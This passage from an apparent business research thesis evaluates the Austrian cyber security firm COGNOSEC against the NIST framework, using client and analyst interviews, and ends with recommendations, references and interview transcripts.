“Yes, COGNOSEC provides foolproof security measures against conventional threats. Personally,
our company never had to deal with very complex cyber problems so far so I cannot really
comment on how well COGNOSEC can handle that. But I would definitely recommend
COGNOSEC to SME clients seeking long-lasting services for their company.”
Another retail SME representative added that the ability of COGNOSEC model to integrate with
others. According to him:
“What I like best about their service model is that it sits well with our business model and other
management tools.”
An industrial analyst on the panel however noted that the model tended to be too complex for some
users with low expertise in this domain. His comments were:
“I think their model is too complex for people who have no expertise in cyber security
management. They need to provide complementary training services or something on those lines.”
The next interview question was mostly industry oriented and asked respondents to evaluate
whether they believed that COGNOSEC’s services offered them competitive advantage in the
market or not. The industry analyst in the panel of respondents offered a detailed explanation to
this and said:
“If we look closely at the company’s performances, annual reports and client testimonials, then I
would say yes. The company has rapidly growing revenues and all its financial indicators are in
its favor. Its portfolio of clients shows that customers are generating positive word-of-mouth and
referrals. Therefore, it shouldn’t be hard to believe that COGNOSEC is set on a path towards
competitive advantage. Let me also mention that their services are considered unique and high-
end due to their state-of-the-art software. This can easily allow them to differentiate themselves in
the market.”
28
A prior customer of COGNOSEC that the brand will have to prove that its strategy is sustainab le
in the long-run, to really impress clients.
“Only if they are able to manage their quality sustainably. Because I see other firms in Austria
that are quickly rising to take on SME clients. COGNOSEC has to be careful.”
COGNOSEC’s clients were then asked to explain why or why not will they work with
COGNOSEC in future. All three former COGNOSEC customers showed willingness to work with
the company in future as well. One explained that:
“Although they are pricey, their product is long-lasting and helps us in other domains as well. I
am the kind of manager who believes in one-time investment BUT quality investment. So
COGNOSEC will be my cyber security provider in future as well.”
Price was raised as a concern by another SME manager as well. He said:
“The price is surely a deterrent. I think this is an investment which cannot yield many results.
Cyber security threats keep changing. SMEs cannot afford to revamp their IT security
infrastructure every year or so. Therefore, I want to explore other options as well.”
The industry analyst responded to this question saying:
“COGNOSEC will have to clearly segment its market and know what service to provide to which
client. Cost conscious customers may want to shift to other competitors. But COGNOSEC’s service
differentiation will continue to be its strength in generating loyalists.”
Finally respondents were asked their opinion on the possible recommendations to further improve
the output performance of COGNOSEC. One SME manager noted:
“COGNOSEC should invest in post-purchase services. For instance, training sessions and
significance of threat awareness should be made in SME decision-makers because most often, like
me, they do not know about these things.”
The industry analyst noted:
29
“COGNOSEC needs to protect itself from competition too. They need to ensure that their business
model is not imitated. They also need a constant stream of fresh talent that can maintain
sustainable advantage by innovating the service.”
The overall responses of interviewees show that COGNOSEC’s services are rated high by
customers in general. However, price is a major factor that clients consider before entertaining
COGNOSEC as a service provider. According to Johnson (2013), in B2B brand equity, it is
imperative for business to take into account three key factors: 1) product/service perceived quality;
2) customer satisfaction; and 3) product/service uniqueness. In case of COGNOSEC, respondents’
views seem to show that these three elements are present in the company service.
According to IT industrial analysts too, service credibility and uniqueness is an essential driving
factor for business growth (Awasthi, 2015). Leung (2012) notes that one primary motivation for
SMEs to pursue cyber security infrastructure is the need for standardization such as ISO27001 and
the SANS Critical Controls. But even overall-aware organizations may not know the risks they
face and how to address these (Valenzano, 2014). Therefore, good cyber security can provide
comparative advantage, product differentiation and even business opportunity (Wamba & Carter,
2014).
Interview results also show that currently COGNOSEC enjoys competitive advantage in the
Austrian market because of product differentiation. The COGNOSEC annual report mentions that
COGNOSEC provides the best services in the given cost structure and that all market competitors
are offering higher prices for the same bundle of cyber security services (Macdonald et al., 2013).
This concept is however debatable as market keeps evolving and new players continue to emerge.
The Austrian Cyber Security Strategy / ACSS (Österreichische Strategie für Cyber Sicherheit /
ÖSCS) provides further business opportunity to cyber security providers such as COGNOSEC as
it helps build awareness of cyber threats among SMEs (Harris & Patten, 2014). Moreover, the fact
that all clients showed willingness to enter new contracts with COGNOSEC in future shows that
the company is doing fairly well in local B2B brand equity.
30
4.3 OVERALL ANALYSIS
The researcher has laid out and elaborated both the survey and interview results in preceding
sections. This section will now conduct an overall analysis of findings keeping in mind the
literature review in chapter 2 and the findings discussed here.
The survey exercise with COGNOSEC employees highlights the strengths and weaknesses of
cyber security model of the company in light of the NIST framework. Based on the information,
it is possible for the researcher to construct an overview of the COGNOSEC security model shown
in exhibit 10. The grey scale depicts the ‘health’ of the function at COGNOSEC. Jet black shade
signifies that the condition of that particular parameter at COGNOSEC is extremely poor whereas
white means the parameter is in excellent condition. Darker the shade, more effort the parameter
needs to improve.
Through survey results, company reports and interviewee responses it was noted that the
company’s strongest points are its risk strategy including assessment, management and mitigat ion,
as well as detection processes. The company excels in securing data for its clients and protecting
critical infrastructure and information. Its response planning, analysis and mitigation in response
to cyber threats are also efficient, as noted by clients who have availed its services.
It was observed that although COGNOSEC provides state-of-the-art solutions to its clients, its
systems are usually complex and clients with low skillset in this domain may not be able to take
full advantage of the system. COGNOSEC has considerably room for improvement in terms of
post-purchase services. One key post-purchase service may be the provision of training and
awareness raising workshops to its clients in the SME sector. According to Valenzano (2014),
post-purchase services can create larger market for the B2B brand, generate positive word-of-
mouth and result in higher brand loyalty. Kozik & Choras (2013) suggested a step further and adds
that pre-purchase services such as demonstrations and free trials can also go a long way in
motivating some clients.
The internal organizational structure of COGNOSEC might also need a review. According to its
annual report, the company is governed by the Manager, Owners and Board of Directors. But
Harris & Patten (2014), in their work, note that IT programming talent is a fad in the modern
31
millennial generation where self-made programmers and hackers have demonstrated amazing
capabilities. Therefore, COGNOSEC can benefit competitively by seeking these highly skilled
individuals through innovative HRM strategies and talent management policies. Internal effective
communication, as noted by Hill et al., (2014), also helps benefit the organizational goals as a
whole.
Finally, while COGNOSEC already has competitive advantage in terms of its service
characteristics, it can make this advantage sustainable over a long period of time by incorporating
a standard strategy for continual improvement. This can be done by introducing programs such as
change management and knowledge management. Change management as defined by Hayes
(2014) is the process of formally managing alterations in the work place practices over time.
Knowledge management is the process of organizing, sharing, archiving and transferring data
within organizations (Kostopoulos, 2012). These processes according to Henson & Sutcliffe
(2013) can help guarantee data safety within organizations and can facilitate development of new
solutions.
Based on Porter’s generic strategies model, it is evident that COGNOSEC clearly enjoys ‘product
differentiation’ success in the Austrian market. Discussion with former clients of the company and
industry analyst showed that COGNOSEC’s services are well-reputed and respected in the market.
The company’s portfolio also shows that it has worked with many large and small corporations in
the past years, providing security. The most important aspect of its competitive advantage that
came to light through this research is that COGNOSEC provides security services that complement
other business management systems at SMEs. Therefore, instead of being a mere investment in
cyber security insurance, it becomes a tool of competitive advantage for businesses.
Mowbray (2013) has shown that cyber security systems work best in integration with knowledge
management, financial management, decision-making and database management systems. While
they can perform as stand-alone systems as well, an ideal cyber security system always
complements other systems within the organization. Johnson (2013) further shows that SMEs
usually look for multi-dimensional solutions that may be addressed by a single tool. This lowers
costs and reduced complexity (Awasthi, 2015). Hence this integrative aspect of the COGNOSEC
cyber security package is a plus point both for the company and its clients.
32
Moreover, Kagan & Cant (2014)’s research shows that cyber security indirectly benefits
corporations, especially SMEs. Very often, SMEs can continue to suffer undetected losses, or face
huge reputation and financial damages in the face of scams and frauds by cyber attackers (Boyer
& McBride, 2009). These attacks are a challenge to competitive advantage of companies. SMEs
which invest in cyber security can prevent information breaches and manage their assets better
than their counterparts. This results in resource management, higher capabilities, customer trust
and higher brand equity. Take for instance, the case of e-commerce. Retailers who manage to
ensure their clients that powerful protection measures are in place, do better at e-commerce sales
generation, compared to those whose payment methods do not seem secure to customers.
Therefore, the researcher has discovered that COGNOSEC services are valued in the market
because they provide competitive advantage to the client in more than one ways. As far as the
company is concerned, its own competitive advantage lies in its ‘product differentiation’ strategy.
Lastly, pricing was identified as somewhat a deterrent in COGNOSEC’s strategy. The researcher
believes that the pricing model of COGNOSEC is adequate considering the quality and uniqueness
of its services. However, COGNOSEC can benefit from market segmentation and customized
strategy for each segment. Market segmentation allows organization to a Cognosecess it target
market and plan penetration strategies accordingly (Kagan & Cant, 2014). For instance, a
segmentation based on nature of SMEs can show that e-commerce SMEs may be more willing to
invest in high-end services. Similarly, segmentation by cyber threats can allow COGNOSEC
management to see which SMEs are most willing to invest in which mode of service. Finally,
segmentation by SMEs’ financial revenues can reveal which clients are willing to invest most
readily in high-end services and which ones require only basic level cyber security.
In light of these findings therefore, the researcher has deduced that COGNOSEC cyber security
services are largely in accordance with the general guidelines laid out by the NIST framework and
therefore the service model is at par with international best practices in cyber security. Slight
improvements in the domains of post-purchase services and sustainable improvements can benefit
COGNOSEC. The research also noted that the company has ‘product differentiation; advantage in
the market and is also a means of competitive advantage for its SME clients. The ability of its
33
cyber security model to integrate with other management models is the strongest plus point favored
by clients.
Exhibit 10: COGNOSEC service model reviewed in light of NIST Framework
5. CONCLUSIONS AND RECOMMENDATIONS
34
In this chapter the researcher has highlighted the key findings of the research study. Three
recommendations are suggested for COGNOSEC to benefit from this discussion. The theoretical
and managerial implications of research are outlined and future research scope if explained here.
5.1 CONCLUSION
This research has investigated in detail, the core features of the cyber security services provided
by the Austrian firm COGNOSEC based on the generic standard model ‘NIST framework’. The
researcher has found that the COGNOSEC service model is comprehensive and sound. It offers
risk assessment, management and mitigation for cyber risks as well as detection of potential threats
that could harm data/information and infrastructure for its clients. The most highlighting features
of COGONOSEC’s service model is that it integrates well with other business management models
including logistics, finances, management and risk mitigation systems. Therefore, the firm’s
services were found to be a valuable competitive advantage tool for SME clients looking for more
than just cyber security insurance.
COGNOSEC itself is able to establish itself as a strong player in the Austrian cyber security market
due to its service differentiation. It achieves this by not only providing state-of-the-art cyber
security features to clients and enabling them to detect and address threats, it also provides
additional services in planning and management. Comments from SME clients of the firm showed
that users are satisfied and would want to work with the company in future. This shows that
COGNOSEC enjoys strong brand equity and loyalty in its current market owing to high perceived
product quality and customer satisfaction.
It was noted in the research that COGNOSEC can benefit by providing both pre and post purchase
services to clients. Considering the complex nature of cyber security and lack of skill, especially
in SMEs to address this domain, COGNOSEC can build better brand equity by creating awareness
regarding cyber threats and training clients in the optimum usage of their ITC security model.
COGNOSEC employees considered that the possible imitation of their service differentia t ion
model by competitors is a risk to business profitability. Moreover, room for improvement was
noted in the existing organizational culture, especially in the HRM domain.
35
5.2 RECOMMENDATIONS
While COGNOSEC already boasts a strong brand equity in the market, three recommendations
are being forwarded by the researcher to further strengthen its position and win greater competitive
advantage.
Firstly and most importantly, the firm must work on developing innovative solutions for post
purchase services. The cyber security industry is a technical one and as noted in this study, skills
in this domain are limited at most SMEs. This is also one major reason that SMEs fail to protect
themselves against cyber risks. The research also observed that the COGNOSEC service model,
while comprehensive and state-of-the-art, was technical and rather complex for many clients.
Therefore, providing user training, introducing customization and continual improvements and
creating awareness regarding threats can help form long-term bonds with customers. It can also
help COGNOSEC win future contracts and can improve word-of-mouth publicity. Indirectly too,
the greater awareness of cyber threats yields greater market demand which is beneficial for
COGNOSEC in the longer run.
Next, there is a need or review some internal organizational management aspects. As discussed in
chapter 2, the NIST framework implementation begins at the grass-roots level and involves the
highest management and the operational level. At COGNOSEC, it was noted that the company
follows a largely pyramidal management hierarchy which limits flexibility in decision-mak ing.
Their hierarchy should be made flatter through stakeholder management and consultation.
Moreover, the HRM department can benefit from creating innovative tests to recruit the best and
brightest talent in the market. For instance, in 2012, the internet was taken by a storm when some
anonymous group/individual by the name of ‘Cicada 3301’ posted a creative cyber puzzle to
evaluate the best programmers in the world. Tens of thousands of people worked on the puzzle
and it generated huge buzz. Later, NSA, CIA and many other agencies copied this innovative
recruitment strategy and devised tests to pick the best available talent. This strategy and other
similar out-of-the-box HRM talent hunts can significantly improve COGNOSEC’s differentia t ion
strategy as its strength lies in its workforce.
36
5.3 THEORETICAL AND MANAGERIAL IMPLICATIONS
The research has added to the available body of literature on the topic by addressing literature gaps
mentioned in section 2.5. Evaluation of a cyber service provider in the theoretical framework of
NIST has been conducted for the first time and the research has shown that this type of analysis
helps discover core strengths and weaknesses of the services. But more importantly, the research
has shown that SMEs have multidimensional benefits of investing in cyber security when the
security model integrates with other management features at firm level.
From managerial perspective, the research is a case study of a successful cyber security service
provider. It has shown that standardization against theoretical frameworks helps reveal inherent
weaknesses. The researcher has also suggested certain recommendations to further strengthen the
company’s market position.
5.4 FUTURE RESEARCH SCOPE
While this research has yielded interesting conclusions, future studies can take the subject forward
and add to literature on the topic. An empirical investigation of the relationship between cyber
security and firm profitability will be worth analyzing. The emerging forms of cyber threats and
the response of service providers in light of HRM techniques is another interesting research area
because many cyber firms are reinventing HRM to hire the very best, as workforce is the greatest
competitive advantage for cyber security firms.
REFERENCES
Ali, M., Sabetta, A. and Bezzi, M., 2013. A marketplace for business software with certified
security properties. In Cyber Security and Privacy (pp. 105-114). Springer Berlin Heidelberg.
37
Awasthi, A., 2015. Development in stages of Cyber security & Risk.International Journal of
Advanced Research in Computer Science, 6(8).
Beachboard, J., Cole, A., Mellor, M., Hernandez, S., Aytes, K. and Massad, N., 2008.
Improving Information Security Risk Analysis Practices for Small and Medium-Sized
Enterprises: A Research Agenda. Journal of Issues in Informing Science and Information
Technology Education, 5, pp.73-85.
Boyer, W.F. and McBride, S.A., 2009. Study of security attributes of smart grid systems–
current cyber security issues. Idaho National Laboratory, USDOE, Under Contract DE-
AC07-05ID14517.
Browne, S., Lang, M. and Golden, W., Linking Threat Avoidance and Security Adoption: A
Theoretical Model For SMEs.
Bryman, A. and Bell, E. (2007) Business Research Methods, New York: Oxford University
Press.
Collis, J. and Hussey, R., (2003). Business Research: A Practical Guide for
Undergraduate and Postgraduate Students. Basingstoke: Palgrave Macmillan
Creswell, J.W. (2009). Research Design: Qualitative, Quantitative, And Mixed Methods
Approaches, Thousand Oaks: Sage Publications.
Crowther, D., & Lancaster, G. (2012). Research methods. Routledge.
Flick, U. (2014). An introduction to qualitative research. Sage.
Goucher, W., 2011. Do SMEs have the right attitude to security?. Computer Fraud &
Security, 2011(7), pp.18-20.
Grundy, M., & Moxon, R. (2013). The effectiveness of airline crisis management on brand
protection: A case study of British Airways. Journal of Air Transport Management, 28, 55-61.
38
Harris, M. and P. Patten, K., 2014. Mobile device security considerations for small-and
medium-sized enterprise business mobility. Information Management & Computer
Security, 22(1), pp.97-114.
Hayes, J., 2014. The theory and practice of change management. Palgrave Macmillan.
Henson, R. and Garfield, J., 2015. What Business Environment Changes Are Needed to
Cause SME’s to Take a Strategic Approach to Information Security?.
Henson, R. and Sutcliffe, D., 2013. A Model for Proactively Insuring SMEs in the Supply
Chain Against Cyber Risk. In Atiner Conference Paper Series No: SME2013-0547. Atiner.
Hill, C., Jones, G. and Schilling, M., 2014. Strategic management: theory: an integrated
approach. Cengage Learning.
Hitt, M., Ireland, R. D., & Hoskisson, R. (2012). Strategic management cases: competitiveness
and globalization. Cengage Learning.
Jackson, S. (2014). Research methods: a modular approach. Cengage Learning.
Jennex, M.E. and Addo, T., 2004. SMEs and knowledge requirements for operating hacker
and security tools. In IRMA 2004 Conference.
Johnson, M.M., 2013. Cyber Crime, Security and Digital Intelligence. Gower Publishing,
Ltd..
Joyce, P., 2015. Strategic management in the public sector. Routledge.
Julisch, K., 2013. Understanding and overcoming cyber security anti-patterns. Computer
Networks, 57(10), pp.2206-2211.
Kagan, A. and Cant, A., 2014. Information Security: A Socio-Technical Solution for
Homeland Security Threats within Small to Medium Sized Enterprises (SMEs). Homeland
Security Rev., 8, p.147.
Kostopoulos, G., 2012. Cyberspace and cybersecurity. CRC Press.
39
Kozik, R. and Choras, M., 2013, September. Current cyber security threats and challenges in
critical infrastructures protection. In Informatics and Applications (ICIA), 2013 Second
International Conference on (pp. 93-97). IEEE.
Kurpjuhn, T., 2015. The SME security challenge. Computer Fraud & Security,2015(3), pp.5-
7.
Leung, S., 2012. Cyber Security Risks and Mitigation for SME. CISSP CISA CBCP, pp.1-50.
Leung, S., 2012. Cyber Security Risks and Mitigation for SME. CISSP CISA CBCP, pp.1-50.
Macdonald, D., Clements, S.L., Patrick, S.W., Perkins, C., Muller, G., Lancaster, M.J. and
Hutton, W., 2013, February. Cyber/physical security vulnerability assessment integration.
In Innovative Smart Grid Technologies (ISGT), 2013 IEEE PES (pp. 1-6). IEEE.
MacGregor, R. and Vrazalic, L., 2005. Role of small business strategic alliances in the
perception of benefits and disadvantages of e-commerce adoption in SMEs. The Idea Group,
Inc.
Miller, P.G., Strang, J. and Miller, P.M. (2010) Addiction Research Methods, Oxford:
Blackwell Publishing Ltd
Mowbray, T.J., 2013. Cybersecurity: Managing Systems, Conducting Testing, and
Investigating Intrusions. John Wiley & Sons.
Myers, M.D. (2009) Qualitative Research in Business & Management, London: Sage
Publications.
Onwubiko, C. and Lenaghan, A.P., 2007, May. Managing security threats and vulnerabilities
for small to medium enterprises. In Intelligence and Security Informatics, 2007 IEEE (pp.
244-249). IEEE.
Osborn, E. and Simpson, A., 2015, November. Small-Scale Cyber Security. InCyber Security
and Cloud Computing (CSCloud), 2015 IEEE 2nd International Conference on (pp. 247-
252). IEEE.
40
Porter, M.E., 1985. Competitive strategy: Creating and sustaining superior performance. The
free, New York.
Ruiz-Vanoye, J.A., Díaz-Parra, O. and Zavala-Díaz, J.C., 2012. Strategic planning for
computer science security of networks and systems in SMEs.African Journal of Business
Management, 6(3), p.762.
Ruiz-Vanoye, J.A., Díaz-Parra, O. and Zavala-Díaz, J.C., 2012. Strategic planning for
computer science security of networks and systems in SMEs.African Journal of Business
Management, 6(3), p.762.
Sanchez, L.E., Villafranca, D., Fernández-Medina, E. and Piattini, M., 2008. Practical
Application of a Security Management Maturity Model for SMEs based on Predefined
Schemas. In SECRYPT (pp. 391-398).
Sangani, N.K. and Vijayakumar, B., 2012. Cyber security scenarios and control for small and
medium enterprises. Informatica Economica, 16(2), p.58.
Sangani, N.K. and Vijayakumar, B., 2012. Cyber security scenarios and control for small and
medium enterprises. Informatica Economica, 16(2), p.58.
Saunders M, Lewis, P and Thornhill, A., (2007). Research Methods for Business Studies, 4th
edn, Harlow: Pearson Education.
Silverman, D. (2013). Doing qualitative research: A practical handbook. SAGE Publications
Limited.
Taylor, M.J., McWilliam, J., Gresty, D. and Hanneghan, M., 2005. Cyber law: Case studies
in the SME environment. Systems Research and Behavioral Science, 22(3), pp.261-267.
Valenzano, A., 2014. Industrial cybersecurity: improving security through access control
policy models. Industrial Electronics Magazine, IEEE, 8(2), pp.6-17.
Wamba, S.F. and Carter, L., 2014. Social media tools adoption and use by SMES: An
empirical study. Journal of Organizational and End User Computing (JOEUC), 26(2), pp.1-
17.
41
Wilkin, C., 2012. The role of IT governance practices in creating business value in
SMEs. Journal of Organizational and End User Computing (JOEUC),24(2), pp.1-17.
Yeboah-Boateng, E.O. and Tadayoni, R., 2010. CYBER-SECURITY. In 21th European
regional ITS conference-Telecommunications at new crossroads: Changing value
configurations, user roles, and regulation.
Yin, R. K. (2014). Case study research: Design and methods. Sage publications.
APPENDIX: INTERVIEW QUESTIONS
1. Do you believe that COGONOSEC’s cyber security services are satisfactory?
2. Does COGNOSEC’s cyber security system provide competitive advantage to the
company?
___________________________________________________________________________
42
3. Will you work with COGNOSEC again in future? Please elaborate why or why not.
________________________________________________________________________
4. How can COGNOSEC further improve its cyber security services?
________________________________________________________________________
SURVEY CONFIRMATION LETTER
44
TRANSCRIPT 1
1. When it comes to security, small and medium sized businesses have to be cautious. They
have to make sure their online security is airtight and that their systems do not get breached.
To this end, we have been working with COGNOSEC for quite some time now. So far their
security systems have allowed us to work without any major security issues. Though since
we have never had any major security issues, I do not know how good COGNOSEC is.
However, they provide great long-term services and I would recommend them to other
small and medium-sized businesses who seek such services.
2. Before we started working with COGNOSEC, we investigated them thoroughly. Their
services were well-appreciated by the companies that used them. We wanted a cyber-
security company that would make our business stronger and we went with COGNOSEC.
Since then our company has had positive reports and customer feedback. It has also allowed
our company to have greater profits. COGNOSEC keeps an eye on the market trends and
then provide services that are unique and of a better quality because of their cutting edge
software system. Because of this, COGNOSEC has carved a name for themselves in the
world of cyber security.
3. Going with COGNOSEC provided our company with many advantages. The services
provided by COGNOSEC are unique and helpful, they are too expensive for smaller
businesses. Also COGNOSEC cyber security systems must be upgraded and renewed
every year which increases the cost more than is feasible. They have to be renewed and the
systems have to be upgraded because cyber protection changes with the development of
new threats. For a business like ours, which does not face that many threats, it is quite
impractical to keep using COGNOSEC. I would rather look for options besides
COGNOSEC as it is too expensive.
45
4. In terms of cyber security, COGNOSEC is going very strong. Their state-of-the-art
software allows them to protect their clients from cyber threats very efficiently. Their
services are beneficial for the customers and that makes COGNOSEC very popular in the
market. However one thing I find lacking with COGNOSEC is that they do not raise
awareness about cyber threats. For small businessmen like myself cyber security does not
hold much significance because we do not understand it. Keeping that in mind,
COGNOSEC should hold awareness seminars and sessions providing training for people
like us to increase our knowledge of such threats.
TRANSCRIPT 2
1. The certain security services are provided by COGNOSEC and I personally believe the security
services provided by COGNOSEC are satisfactory. They are a good measure against the outside
threats faced by COGNOSEC. To be honest we did not have such situations to be faced where our
company had to deal with the severe threats or problems related to the cyber world. So, as a result
the COGNOSEC security systems had never been tested so we are still unsure that well
COGNOSEC can deal with the situations. But I believe that COGNOSEC is good for small
businesses so I will personally recommend them to go for COGNOSEC
2. If we have a closer look on the COGNOSEC ‘s performance of the financial reports, annual
reports and the clients’ suggestion and opinions, the answer is in affirmation. The overall revenues
of the company have been constantly increasing in number and the financial performance is the
proof. Moreover, the clients’ portfolio depicts that the customers are satisfied with the company’s
overall performance and they have spread the goodwill of the company to their friends and
relatives. And thus we should believe that COGNOSEC is having a competitive gain very soon.
The services have been phenomenal and the market shares have been increasing.
46
3. The price needs to be considered, as it is an important factor for COGNOSEC. In my personal
I guess that that we have been investing with no productivity in the end. The threats are not new
in the market and they have been constantly taking place in new shapes and places and this is the
reason the small businesses are unable to afford the cyber anti-securities to improve their IT
infrastructure. So, I personally believe that these small companies should be considered as well
and such systems and alternatives should be developed which actually do benefit them in the long
term.
4. COGNOSEC has done a lot of investments in different assets and they need to invest in the
post-purchase service behavior. For example, there should be awareness campaigns and training
modules be held for the employees of the small businesses so that their knowledge is increased
because after all employees and the management do not have a sufficient knowledge of the cyber
security and its threats and the ways these threats can be demolished. Small businesses have
limited and low budget so they are unable to hold the training sessions and the meeting grounds to
take place so thus their employees seldom know about the cyber threats and the IT world.
47
TRANSCRIPT 3
1. In my personal opinion COGNOSEC is one of the few companies in Europe which has the
PCI Security standards recognition and are also qualified security management. Their main
strategy is to develop and deliver customized solution for each specific project. Also with
the help of its penetration testing the company is providing an independent and reliable
view of the problems related to cyber security. The Company also works in the interest of
the administration in companies, and gives them the free advice with respect to their
general needs of cyber security by providing them the administrative services or
procedures, that matches the needs of their different cyber applications. So in my opinion
COGNOSEC services are not just satisfactory but also self-sufficient.
2. Due to the expansion of its services in various countries COGNOSEC’S has managed to
sustain its position in the industry. By looking into the details of the company’s information
obtained from published statistics it is observed that COGNOSEC'S objective for income
development is 15 percent for every year and with the help of its strategic management the
goal of the margin of 15% is maintained. It was only possible because of the diversifica t ion
of the company’s services. The arrangement for customers in which it provides separate
services to its consumers, has led to a positive verbal exchange and referrals with the
clients. Their remarkable administrative services are keeping them separate from their
competitors in the business sector. I think the recent Company’s revenues also suggest that
by due to its distinctive cyber security services the company not just had gained the
competitive advantage but has quickly developed its income.
3. I think the cost of dealing with such cyber security crimes is quiet high and due to its ever
changing nature, the investment in such service is necessary but would be cost obstructive.
Although COGNOSEC provides customised services to its customers but its price is acting
as an obstacle that is deterring us from buying this service because being a small
organization it is not cost effective for us to invest in security systems and reinvent them
over and over again. That is why I would want to opt the other opportunities present in the
market as well.
48
4. In my opinion COGNOSEC should educate their customers to adopt certain methodologies
that would help their companies in protecting themselves from the alarming situations that
are created through cybercrimes. Also in order to minimize the disruption they should also
develop contingency plans. A contingency plan or a general alternate course of action
should focus on three segments: incidence response, recovery, and business continuity.
Such steps would not just help the companies like us in saving our data but will also keep
us functioning through crisis.
TRANSCRIPT 4
1. The answer is yes; there is a high- level of security provided by COGNOSEC which deals
with conventional threats. We never had to handle any complicated cyber problems so I
can’t say how the company might handle it. Regardless, I do give my recommendation to
use COGNOSEC particular for SME clients who want stable services with a company
they can maintain a long-term relationship with.
2. By looking at the performances of the organization as well as its testimonials from clients
and annual reports, my answer is yes. There is significant growth of revenues in the
company where all of the indicators financially are in the favor of the company. The client
portfolio depicts that there is word-of-mouth which is positive as well as strong referrals
also. Thus, it isn’t a difficult thing to believe that COGNOSEC is on its way in acquiring
the comparative edge. I’d like to also say how the services of the company are very unique
as well as being of the best quality considering their high quality software. As a result, they
can be differentiated in the market quite easily.
3. Unfortunately, price does act as a deterrent. I think that this investment doesn’t have
many returns to get results. The threats in cyber security keep on adjusting as SMEs can’t
really afford to keep changing their IT infrastructure on an annual basis. Thus, I wish to
explore different options in addition to this.